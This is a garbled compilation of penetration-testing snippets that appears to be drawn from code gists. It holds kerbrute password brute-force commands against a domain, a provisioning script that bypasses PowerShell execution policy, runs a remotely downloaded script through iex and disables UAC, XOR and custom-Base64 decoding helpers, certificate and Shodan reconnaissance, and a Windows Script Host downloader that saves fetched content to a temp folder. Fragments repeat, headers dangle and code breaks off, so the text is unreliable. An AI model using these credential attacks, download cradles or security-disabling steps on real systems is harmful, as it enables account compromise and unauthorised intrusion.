With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
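REM Resolve an account name to its SID. Without a domain filter the query can
REM return more than one row if the same name exists in several domains.
REM NOTE: WMIC is deprecated on current Windows releases; the CIM class queried
REM here is Win32_UserAccount, which Get-CimInstance can read as well.
wmic useraccount where name='test_user' get sid
REM Same lookup restricted to one domain. The quotes must be plain ASCII
REM apostrophes; typographic quotes make the WQL filter fail to parse.
wmic useraccount where (name='test_user' and domain='corp.com') get sid
REM Reverse lookup: resolve a SID back to the account name.
wmic useraccount where sid='S-1-3-12-12451234567-1234567890-1234567-1434' get name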
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
# Provisioning steps for a lab machine. Each step below relaxes a host
# security control, so keep this to disposable VMs rather than daily-use hosts.
#Bypass Execution Policy | |
# -Scope CurrentUser persists the Bypass policy for this user; -Force skips the prompt.
Set-ExecutionPolicy Bypass -Scope CurrentUser -Force | |
#Install boxstarter | |
# 3072 is the Tls12 flag; it is OR-ed into the allowed protocols before the download.
# NOTE(review): the bootstrapper is downloaded and run through iex with no hash or
# signature check, so the HTTPS connection is the only integrity control here.
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://boxstarter.org/bootstrapper.ps1')); Get-Boxstarter -Force | |
#Disable UAC | |
# NOTE(review): Disable-UAC looks like a Boxstarter helper, confirm; nothing visible
# here turns UAC back on afterwards.
Disable-UAC | |
#Disable Microsoft Update |
MITRE ATT&CK | |
------------ | |
MITRE ATT&CK® : | |
https://attack.mitre.org | |
Getting Started with ATT&CK: Detection and Analytics : | |
https://medium.com/mitre-attack/getting-started-with-attack-detection-a8e49e4960d0 | |
Getting Started with ATT&CK: Adversary Emulation and Red Teaming : | |
https://medium.com/mitre-attack/getting-started-with-attack-red-29f074ccf7e3 |
import os | |
import struct | |
import sys | |
#Single Byte XOR | |
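def xor(data, key):
    """Return *data* with every character XOR-ed against the single value *key*.

    Applying the function twice with the same key restores the input.
    Single-byte XOR is obfuscation, not encryption: a byte key has only
    256 possible values, so the plaintext can be recovered by trying them all.

    Args:
        data: Text to transform, one character at a time.
        key: Integer XOR-ed with each character's code point.

    Returns:
        The transformed string (empty when *data* is empty).
    """
    # join() builds the result once instead of re-copying the string on
    # every iteration as repeated "+=" does.
    return "".join(chr(ord(ch) ^ key) for ch in data)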
import base64 | |
# Standard Base64 alphabet, followed by the "=" padding character.
chr_set = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
# Re-ordered alphabet used by the sample: digits, "+", "/", then the letters.
non_chr_set = "0123456789+/ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz="
encoded = "G6JgP6w="
# Map each symbol from the custom alphabet to the standard one by position,
# giving a string that a stock Base64 decoder accepts. A symbol missing from
# non_chr_set makes find() return -1, which selects the final "=" entry.
re_encoded = "".join(chr_set[non_chr_set.find(symbol)] for symbol in encoded)
import base64 | |
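# Base64 is a reversible encoding, not encryption: anyone can decode it.
plain_text = "One"
# b64encode() requires bytes on Python 3, so encode the text first; the
# parenthesised print() form runs on both Python 2 and Python 3.
encoded = base64.b64encode(plain_text.encode("ascii"))
print(encoded.decode("ascii"))
decoded = base64.b64decode(encoded)
print(decoded.decode("ascii"))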
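# Watch the live Certificate Transparency feed for names ending in ".org.com",
# e.g. to spot newly issued certificates for your own domain.
# Single quotes keep the shell from interpreting "$" or the backslashes.
certstream | grep -E '\.org\.com$'
# List certificates already logged for the domain. The URL is quoted so the
# shell does not treat "?" as a glob character; "jq ." pretty-prints the JSON
# and also works on jq versions that require an explicit filter.
# NOTE(review): this is the v0 API path; confirm it is still served.
curl -s "https://certspotter.com/api/v0/certs?domain=org.com" | jq .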
from shodan import Shodan | |
import ipaddress | |
import pprint | |
import json | |
pp = pprint.PrettyPrinter(indent=2) | |
api = Shodan('') | |
net = ipaddress.ip_network('') | |
for xIp in net.hosts(): |
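// Fetch the URL passed as the first script argument and save the response
// body to a fixed path. Uses ActiveXObject and WScript, so it runs under
// Windows Script Host.
// Detection note: a script host process that makes an HTTP request through
// WinHttpRequest and then writes a file with ADODB.Stream is worth alerting
// on, especially when the target is under C:\Windows\Temp.
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
// Declared with var so the stream is not created as an implicit global.
var BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1; // 1 = adTypeBinary: store the body as raw bytes
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("c:\\Windows\\Temp\\file.txt");
// Release the stream once the file has been written.
BinStream.Close();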